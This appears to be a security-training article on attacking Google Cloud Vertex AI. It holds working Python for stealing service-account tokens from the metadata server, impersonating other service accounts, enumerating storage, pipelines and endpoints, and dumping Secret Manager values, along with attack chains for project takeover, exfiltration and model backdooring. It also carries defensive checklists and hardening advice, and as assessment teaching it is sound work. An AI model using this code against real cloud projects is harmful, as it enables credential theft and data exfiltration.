GCP Vertex AI Attack Surface
Security assessment of Google Cloud Vertex AI -- service account exploitation, endpoint security, notebook attacks, and pipeline manipulation.
Vertex AI Architecture
GCP Vertex AI provides managed ML services integrated with Google Cloud's IAM, networking, and storage systems. Resources are organized by GCP projects and use service accounts for authentication.
Key Components
| Component | Identity | Storage | Network |
|---|---|---|---|
| Workbench | Service account | GCS | VPC optional |
| Training Jobs | Custom service account | GCS input/output | VPC optional |
| Endpoints | Service account | Model in GCS/AR | Internet-facing |
| Pipelines | Pipeline SA | GCS artifacts | VPC |
| Feature Store | Featurestore SA | BigTable/BigQuery | VPC |
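The component table above can be turned into a concrete probe list. The sketch below derives the API hosts and resource collections each component exposes; it is pure string construction under the assumption that the project and region values come from prior reconnaissance (the notebooks.googleapis.com path for Workbench is an approximation of the Notebooks API layout, not an exhaustive reference).

```python
# Sketch: map each Vertex AI component to the API surface an assessor
# would probe. No GCP access needed -- pure path construction.

def vertex_attack_surface(project: str, region: str) -> dict:
    """Return component -> API host/resource collection to enumerate."""
    host = f"{region}-aiplatform.googleapis.com"
    parent = f"projects/{project}/locations/{region}"
    return {
        "workbench": f"notebooks.googleapis.com/v1/{parent}/instances",
        "training_jobs": f"{host}/v1/{parent}/customJobs",
        "endpoints": f"{host}/v1/{parent}/endpoints",
        "pipelines": f"{host}/v1/{parent}/pipelineJobs",
        "feature_store": f"{host}/v1/{parent}/featurestores",
    }

if __name__ == "__main__":
    for component, path in vertex_attack_surface("target-project",
                                                 "us-central1").items():
        print(f"{component}: https://{path}")
```

Each of these collections honors a simple GET with a bearer token, so the same token-extraction technique shown below feeds directly into this enumeration.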
Attack Techniques
1. Service Account Token Extraction
Vertex AI Workbench instances (formerly AI Platform Notebooks) run with a GCP service account. The GCP metadata server at metadata.google.internal provides access tokens without requiring any additional authentication -- any code executing on the instance can obtain tokens for the attached service account.
Unlike AWS IMDSv2, which requires a session token obtained through a separate PUT request, GCP's metadata server requires only a static Metadata-Flavor: Google header, which any code running on the instance can trivially add. The primary risk is that Workbench service accounts are often granted the Editor role on the project, giving them write access to nearly every GCP resource.
import requests
# From inside a Vertex AI Workbench instance
# GCP metadata server for service account tokens
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
# Get the service account
sa = requests.get(
f"{metadata_url}/instance/service-accounts/default/email",
headers=headers
).text
print(f"Service Account: {sa}")
# Get an access token
token = requests.get(
f"{metadata_url}/instance/service-accounts/default/token",
headers=headers
).json()["access_token"]
# Enumerate accessible projects
projects = requests.get(
"https://cloudresourcemanager.googleapis.com/v1/projects",
headers={"Authorization": f"Bearer {token}"}
).json()
for p in projects.get("projects", []):
    print(f"Project: {p['name']} ({p['projectId']})")
Full Metadata Enumeration
import requests
metadata_url = "http://metadata.google.internal/computeMetadata/v1"
headers = {"Metadata-Flavor": "Google"}
def get_metadata(path):
"""Recursively enumerate metadata entries."""
resp = requests.get(
f"{metadata_url}/{path}",
headers={**headers, "Accept": "application/json"},
params={"recursive": "true"}
)
return resp.json() if resp.status_code == 200 else resp.text
# Instance metadata
instance = get_metadata("instance")
print(f"Instance name: {instance.get('name')}")
print(f"Zone: {instance.get('zone')}")
print(f"Machine type: {instance.get('machineType')}")
# Network interfaces (discover VPC, subnet, external IP)
for iface in instance.get('networkInterfaces', []):
print(f"Network: {iface.get('network')}")
print(f" Internal IP: {iface.get('ip')}")
for ac in iface.get('accessConfigs', []):
print(f" External IP: {ac.get('externalIp')}")
# All service accounts and their scopes
for sa_email in instance.get('serviceAccounts', {}):
sa_info = instance['serviceAccounts'][sa_email]
print(f"\nService Account: {sa_email}")
print(f" Scopes: {sa_info.get('scopes', [])}")
# Project-level metadata (may contain secrets set by admins)
project = get_metadata("project")
for key, value in project.get('attributes', {}).items():
print(f"Project attribute: {key} = {str(value)[:100]}")
if any(kw in key.lower() for kw in
['key', 'secret', 'password', 'token', 'credential']):
print(f" [!] Potentially sensitive project attribute")
# Check for custom instance attributes
for key, value in instance.get('attributes', {}).items():
    print(f"Instance attribute: {key} = {str(value)[:100]}")
Service Account Privilege Escalation
GCP service accounts can impersonate other service accounts if they have the iam.serviceAccountTokenCreator role. This creates privilege escalation chains that are not visible from the Workbench instance itself.
import requests
import json
def check_sa_impersonation(token, project_id, source_sa):
"""Check if the current service account can impersonate others."""
headers = {"Authorization": f"Bearer {token}"}
# List all service accounts in the project
sa_url = (
f"https://iam.googleapis.com/v1/projects/{project_id}"
f"/serviceAccounts"
)
sas = requests.get(sa_url, headers=headers).json()
for sa in sas.get('accounts', []):
sa_email = sa['email']
if sa_email == source_sa:
continue
# Attempt to generate an access token for this SA
impersonate_url = (
f"https://iamcredentials.googleapis.com/v1/projects/-"
f"/serviceAccounts/{sa_email}:generateAccessToken"
)
resp = requests.post(
impersonate_url,
headers={
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
},
json={"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
)
if resp.status_code == 200:
print(f"[!] Can impersonate: {sa_email}")
impersonated_token = resp.json()['accessToken']
# Test what this SA can access
test_permissions(impersonated_token, project_id)
else:
print(f"Cannot impersonate: {sa_email}")
def test_permissions(token, project_id):
"""Quick permission check for an access token."""
headers = {"Authorization": f"Bearer {token}"}
tests = {
"BigQuery": f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets",
"GCS": "https://storage.googleapis.com/storage/v1/b?project=" + project_id,
"Compute": f"https://compute.googleapis.com/compute/v1/projects/{project_id}/zones",
"SecretManager": f"https://secretmanager.googleapis.com/v1/projects/{project_id}/secrets",
}
for service, url in tests.items():
resp = requests.get(url, headers=headers)
status = "accessible" if resp.status_code == 200 else "denied"
        print(f" {service}: {status}")
2. Vertex AI Endpoint Enumeration
Vertex AI endpoints serve model predictions. By default, endpoints require IAM authentication, but misconfigurations such as allUsers or allAuthenticatedUsers bindings on the endpoint resource can expose models publicly.
from google.cloud import aiplatform
aiplatform.init(project="my-project", location="us-central1")
# List all endpoints
endpoints = aiplatform.Endpoint.list()
for endpoint in endpoints:
print(f"Endpoint: {endpoint.display_name}")
print(f" Resource: {endpoint.resource_name}")
print(f" Models: {[m.display_name for m in endpoint.list_models()]}")
# Test prediction
try:
result = endpoint.predict(instances=[{"text": "test"}])
print(f" Prediction: {result.predictions[:1]}")
except Exception as e:
        print(f" Error: {e}")
Endpoint IAM Policy Analysis
import requests
def analyze_endpoint_iam(token, project_id, location, endpoint_id):
"""Check IAM policy on a Vertex AI endpoint for overly permissive access."""
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
resource = (
f"projects/{project_id}/locations/{location}"
f"/endpoints/{endpoint_id}"
)
url = (
f"https://{location}-aiplatform.googleapis.com/v1/{resource}"
f":getIamPolicy"
)
resp = requests.post(url, headers=headers, json={})
policy = resp.json()
findings = []
for binding in policy.get('bindings', []):
role = binding['role']
members = binding['members']
# Check for overly permissive access
for member in members:
if member in ('allUsers', 'allAuthenticatedUsers'):
findings.append({
"severity": "CRITICAL",
"finding": f"Endpoint publicly accessible: "
f"{member} has {role}"
})
elif member.startswith('domain:'):
findings.append({
"severity": "MEDIUM",
"finding": f"Domain-wide access: {member} has {role}"
})
return findings
# Also check for endpoints exposed via API Gateway or Cloud Endpoints
def check_api_gateway_exposure(token, project_id):
"""Check if Vertex AI endpoints are exposed via API Gateway."""
headers = {"Authorization": f"Bearer {token}"}
url = (
f"https://apigateway.googleapis.com/v1/projects/{project_id}"
f"/locations/-/apis"
)
resp = requests.get(url, headers=headers)
for api in resp.json().get('apis', []):
        print(f"API Gateway: {api['displayName']} - {api['name']}")
3. GCS Training Data Access
Vertex AI stores training data, model artifacts, pipeline outputs, and TensorBoard logs in Google Cloud Storage. GCS bucket naming is less predictable than SageMaker's convention, but bucket labels and IAM policies reveal ML-related buckets.
from google.cloud import storage
client = storage.Client()
# List buckets looking for ML data
for bucket in client.list_buckets():
if any(kw in bucket.name.lower() for kw in ['ml', 'training', 'data', 'model', 'vertex']):
print(f"\nBucket: {bucket.name}")
blobs = list(bucket.list_blobs(max_results=10))
for blob in blobs:
            print(f" {blob.name} ({blob.size} bytes)")
Deep GCS Enumeration and Sensitive Data Discovery
from google.cloud import storage
import json
client = storage.Client()
def enumerate_ml_buckets(client):
"""Comprehensive ML bucket discovery and content analysis."""
ml_keywords = ['ml', 'training', 'data', 'model', 'vertex', 'pipeline',
'experiment', 'tensorboard', 'artifact', 'feature']
sensitive_extensions = ['.csv', '.parquet', '.jsonl', '.pkl', '.pickle',
'.pt', '.pth', '.h5', '.pb', '.onnx']
for bucket in client.list_buckets():
# Check bucket name and labels
is_ml = any(kw in bucket.name.lower() for kw in ml_keywords)
labels = bucket.labels or {}
is_ml = is_ml or any(kw in str(labels).lower() for kw in ml_keywords)
if not is_ml:
continue
print(f"\n{'='*60}")
print(f"Bucket: {bucket.name}")
print(f" Location: {bucket.location}")
print(f" Storage class: {bucket.storage_class}")
print(f" Labels: {labels}")
print(f" Versioning: {bucket.versioning_enabled}")
print(f" Public: {bucket.iam_configuration.public_access_prevention}")
# Check bucket IAM policy
try:
policy = bucket.get_iam_policy()
for role, members in policy.items():
for member in members:
if member in ('allUsers', 'allAuthenticatedUsers'):
print(f" [CRITICAL] Public access: {member} -> {role}")
except Exception as e:
print(f" Cannot read IAM: {e}")
# Enumerate contents looking for sensitive data
sensitive_files = []
total_size = 0
for blob in bucket.list_blobs(max_results=100):
total_size += blob.size
if any(blob.name.endswith(ext) for ext in sensitive_extensions):
sensitive_files.append({
"name": blob.name,
"size": blob.size,
"updated": str(blob.updated)
})
print(f" Total size (sampled): {total_size / 1e6:.1f} MB")
if sensitive_files:
print(f" Sensitive files found: {len(sensitive_files)}")
for f in sensitive_files[:10]:
print(f" {f['name']} ({f['size']} bytes)")
# Also check BigQuery datasets (common for feature stores)
def check_bigquery_datasets(token, project_id):
"""Enumerate BigQuery datasets that may contain ML features or training data."""
import requests
headers = {"Authorization": f"Bearer {token}"}
url = f"https://bigquery.googleapis.com/bigquery/v2/projects/{project_id}/datasets"
resp = requests.get(url, headers=headers)
for ds in resp.json().get('datasets', []):
ds_ref = ds['datasetReference']
print(f"BigQuery dataset: {ds_ref['datasetId']}")
# Check for ML-related tables
tables_url = (
f"https://bigquery.googleapis.com/bigquery/v2/projects/"
f"{project_id}/datasets/{ds_ref['datasetId']}/tables"
)
tables = requests.get(tables_url, headers=headers).json()
for table in tables.get('tables', []):
            print(f" Table: {table['tableReference']['tableId']}")
4. Pipeline Artifact Extraction
Vertex AI Pipelines (based on Kubeflow Pipelines) orchestrate ML workflows. Pipeline runs contain artifacts including trained models, evaluation metrics, dataset references, and hyperparameters. Compromising pipeline access reveals the entire ML workflow and its data dependencies.
from google.cloud import aiplatform
# List pipeline runs and their artifacts
for run in aiplatform.PipelineJob.list():
print(f"Pipeline: {run.display_name}")
print(f" State: {run.state}")
print(f" Created: {run.create_time}")
# Pipeline artifacts contain model files, metrics, and parameters
for detail in run.task_details:
print(f" Task: {detail.task_name}")
for artifact in detail.outputs.values():
            print(f" Output: {artifact}")
Pipeline Template and Configuration Extraction
from google.cloud import aiplatform
import json
def extract_pipeline_details(project_id, location):
"""Extract pipeline templates and configurations that reveal
the full ML workflow."""
aiplatform.init(project=project_id, location=location)
for run in aiplatform.PipelineJob.list():
print(f"\n{'='*60}")
print(f"Pipeline: {run.display_name}")
print(f" State: {run.state}")
print(f" Service Account: {run.service_account}")
print(f" Network: {run.network}")
# Extract pipeline spec (the workflow definition)
if hasattr(run, 'pipeline_spec'):
spec = run.pipeline_spec
# Pipeline specs reveal component images, input/output locations,
# and the full data flow
if 'components' in spec:
for comp_name, comp in spec['components'].items():
print(f" Component: {comp_name}")
if 'executorLabel' in comp:
print(f" Executor: {comp['executorLabel']}")
# Extract runtime parameters (may contain sensitive values)
if hasattr(run, 'runtime_config'):
config = run.runtime_config
if 'parameters' in config:
for param_name, param_value in config['parameters'].items():
value_str = str(param_value)[:100]
print(f" Param: {param_name} = {value_str}")
if any(kw in param_name.lower() for kw in
['key', 'secret', 'token', 'password']):
print(f" [!] Potentially sensitive parameter")
# Also check Vertex AI Metadata Store for experiment tracking
print("\n=== Metadata Store (Experiments) ===")
for experiment in aiplatform.Experiment.list():
    print(f"Experiment: {experiment.name}")
5. Secret Manager Exploitation
GCP Secret Manager is the recommended way to store credentials, but Vertex AI service accounts may have overly broad access to secrets beyond what ML workflows require.
import requests
def enumerate_secrets(token, project_id):
"""Enumerate and attempt to access Secret Manager secrets."""
headers = {"Authorization": f"Bearer {token}"}
# List all secrets
url = (
f"https://secretmanager.googleapis.com/v1/projects/{project_id}"
f"/secrets"
)
resp = requests.get(url, headers=headers)
secrets = resp.json().get('secrets', [])
for secret in secrets:
secret_name = secret['name'].split('/')[-1]
print(f"\nSecret: {secret_name}")
print(f" Created: {secret.get('createTime')}")
labels = secret.get('labels', {})
print(f" Labels: {labels}")
# Attempt to access the latest version
version_url = (
f"https://secretmanager.googleapis.com/v1/"
f"{secret['name']}/versions/latest:access"
)
version_resp = requests.get(version_url, headers=headers)
if version_resp.status_code == 200:
import base64
payload = version_resp.json()['payload']['data']
decoded = base64.b64decode(payload).decode('utf-8', errors='replace')
print(f" [!] Accessible - Value: {decoded[:50]}...")
else:
            print(f" Access denied ({version_resp.status_code})")
Defensive Assessment Checklist
| Control Area | What to Verify | MITRE ATLAS Reference |
|---|---|---|
| Service Accounts | Least-privilege roles, no Editor or Owner on Workbench SAs | AML.T0003 (ML Model Access) |
| Metadata Server | Custom metadata attributes do not contain secrets | AML.TA0008 (Collection) |
| Network | VPC Service Controls, Private Google Access, no public IPs on Workbench | AML.T0002 (Active Scanning) |
| GCS | Uniform bucket-level access, no allUsers bindings, encryption | AML.T0000 (Search for Data) |
| Endpoints | IAM-only authentication, no public access bindings | AML.T0003 (ML Model Access) |
| Secrets | Scoped Secret Manager access, audit logging | AML.TA0008 (Collection) |
| Pipelines | Pipeline SA separate from Workbench SA, no secrets in parameters | AML.T0018 (Backdoor ML Model) |
| Logging | Cloud Audit Logs enabled, Data Access logs for GCS and BigQuery | AML.TA0006 (Defense Evasion) |
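The first checklist row (no Editor or Owner on Workbench service accounts) can be automated. A minimal sketch, assuming the IAM bindings are exported beforehand (e.g. via gcloud projects get-iam-policy --format=json); the evaluation itself is pure and runs over any such policy document:

```python
# Sketch: flag service accounts holding broad basic roles in an exported
# IAM policy. Basic roles on a Workbench SA turn any notebook compromise
# into near-total project compromise.

BROAD_ROLES = {"roles/editor", "roles/owner"}

def flag_broad_sa_roles(bindings: list) -> list:
    """Return 'member -> role' findings for SAs bound to basic roles."""
    findings = []
    for binding in bindings:
        if binding.get("role") not in BROAD_ROLES:
            continue
        for member in binding.get("members", []):
            if member.startswith("serviceAccount:"):
                findings.append(f"{member} -> {binding['role']}")
    return findings

# Hypothetical exported bindings for illustration
policy = [
    {"role": "roles/editor",
     "members": ["serviceAccount:wb@proj.iam.gserviceaccount.com"]},
    {"role": "roles/aiplatform.user",
     "members": ["serviceAccount:pipe@proj.iam.gserviceaccount.com"]},
]
for finding in flag_broad_sa_roles(policy):
    print(f"[!] {finding}")
```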
Recommended Hardening
- Use dedicated service accounts per Workbench instance with only the IAM roles needed for that user's work, never Editor or Owner.
- Enable VPC Service Controls to create a security perimeter around ML resources, preventing data exfiltration even with valid credentials.
- Use Workload Identity Federation instead of service account keys wherever possible.
- Enable Cloud Audit Logs with Data Access logging for GCS, BigQuery, and Vertex AI API calls.
- Remove public IPs from Workbench instances and use IAP (Identity-Aware Proxy) tunnels for access.
- Enforce organization policies such as constraints/iam.disableServiceAccountKeyCreation and constraints/compute.requireShieldedVm.
- Use Customer-Managed Encryption Keys (CMEK) for GCS buckets, BigQuery datasets, and Vertex AI resources.
- Implement VPC-SC ingress/egress rules to restrict which identities and services can access the ML perimeter.
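Whether the listed organization policies are actually enforced can be verified programmatically. A sketch under the assumption that the effective policies have already been fetched (e.g. with gcloud resource-manager org-policies describe --effective) into the v1-style booleanPolicy JSON shape; only the pure evaluation step is shown:

```python
# Sketch: check fetched effective org-policy documents against the
# boolean constraints recommended above and report any gaps.

REQUIRED_BOOLEAN_CONSTRAINTS = [
    "constraints/iam.disableServiceAccountKeyCreation",
    "constraints/compute.requireShieldedVm",
]

def missing_constraints(effective_policies: dict) -> list:
    """Return required boolean constraints that are absent or unenforced."""
    gaps = []
    for constraint in REQUIRED_BOOLEAN_CONSTRAINTS:
        policy = effective_policies.get(constraint, {})
        if not policy.get("booleanPolicy", {}).get("enforced", False):
            gaps.append(constraint)
    return gaps

# Hypothetical fetched state: key creation blocked, Shielded VM not enforced
fetched = {
    "constraints/iam.disableServiceAccountKeyCreation": {
        "booleanPolicy": {"enforced": True}
    },
}
for gap in missing_constraints(fetched):
    print(f"[!] Not enforced: {gap}")
```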
Common Attack Chains
Chain 1: Workbench to Project Takeover
1. Initial access via compromised user credentials or malicious notebook
2. Extract service account token from GCP metadata server
3. Discover the SA has Editor role on the project (common misconfiguration)
4. Enumerate all project resources: GCS, BigQuery, Compute Engine, GKE
5. Access Secret Manager to extract API keys and database credentials
6. Test service account impersonation for SAs in other projects
7. If impersonation succeeds, pivot to other projects in the organization
Chain 2: Pipeline-Based Data Exfiltration
1. Access Vertex AI Pipelines via compromised service account
2. Extract pipeline templates to understand data flow
3. Identify GCS buckets and BigQuery tables used for training data
4. Access training datasets containing PII or proprietary data
5. Exfiltrate data to attacker-controlled GCS bucket (if VPC-SC absent)
6. Use extracted data for model replication or competitive intelligence
Chain 3: Model Artifact Tampering
1. Enumerate GCS buckets containing model artifacts
2. Download the production model artifact
3. Inject a backdoor (e.g., trojan trigger in the model weights)
4. Upload modified artifact to the same GCS path
5. If model versioning is not enforced, the next deployment loads the backdoored model
6. Backdoor activates on specific trigger inputs in production
GCP-Specific Risks
GCP presents several unique risks compared to AWS and Azure in the ML security context:
| GCP-Specific Risk | Description | Mitigation |
|---|---|---|
| Default Compute Engine SA | Vertex AI may use the default CE service account, which has Editor on the project | Create dedicated SAs with minimum roles |
| Organization policy gaps | Organization policies may not cover Vertex AI-specific resources | Extend org policies to cover aiplatform.* constraints |
| VPC-SC complexity | VPC Service Controls are powerful but complex; misconfigured perimeters create false sense of security | Regular VPC-SC configuration audits |
| BigQuery integration | Vertex AI Feature Store uses BigQuery, which may contain non-ML sensitive data | Separate BigQuery datasets for ML features |
| Artifact Registry shared repos | ML container images may share repos with non-ML containers | Dedicated repos for ML images with strict IAM |
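The first risk row is easy to check mechanically, because the default Compute Engine service account always follows the fixed pattern PROJECT_NUMBER-compute@developer.gserviceaccount.com. A sketch; the SA emails would come from Workbench instance or training-job metadata gathered earlier:

```python
# Sketch: flag resources attached to the default Compute Engine service
# account, which commonly carries the Editor role on the project.
import re

DEFAULT_CE_SA = re.compile(r"^\d+-compute@developer\.gserviceaccount\.com$")

def uses_default_ce_sa(sa_email: str) -> bool:
    """True if the email matches the default Compute Engine SA pattern."""
    return bool(DEFAULT_CE_SA.match(sa_email))

# Hypothetical SA emails for illustration
for sa in ["123456789012-compute@developer.gserviceaccount.com",
           "vertex-workbench@my-proj.iam.gserviceaccount.com"]:
    flag = "[!] default CE SA" if uses_default_ce_sa(sa) else "dedicated SA"
    print(f"{sa}: {flag}")
```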
MITRE ATLAS Mapping for Vertex AI Attacks
| Attack Technique | ATLAS ID | Vertex AI-Specific Context |
|---|---|---|
| Metadata server token extraction | AML.TA0002 (Initial Access) | Workbench service account with broad project access |
| GCS data enumeration | AML.T0000 (Search for Victim's Data) | ML buckets discoverable by labels and naming |
| Endpoint probing | AML.T0002 (Active Scanning) | Vertex AI endpoints may have public IAM bindings |
| Model extraction via prediction API | AML.T0024 (Model Extraction) | High-query-volume attacks via Vertex AI Prediction |
| Pipeline artifact tampering | AML.T0018 (Backdoor ML Model) | GCS model artifacts modifiable if bucket IAM is weak |
| Feature Store poisoning | AML.T0020 (Data Poisoning) | BigQuery/Bigtable feature data modification |
Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- AWS SageMaker -- AWS comparison
- Azure ML -- Azure comparison
References
- Google Cloud Vertex AI Security Overview - Google Cloud (2024) - Official security architecture documentation
- "GCP Service Account Best Practices" - Google Cloud (2024) - Limiting service account scope and key management
- "Securing AI Workloads on Google Cloud" - Google Cloud Architecture Center (2024) - ML security architecture patterns
- "BeyondProd: A New Approach to Cloud-Native Security" - Google (2019) - GCP security model foundations
Review Question
What is the primary lateral movement path from a compromised Vertex AI Workbench instance?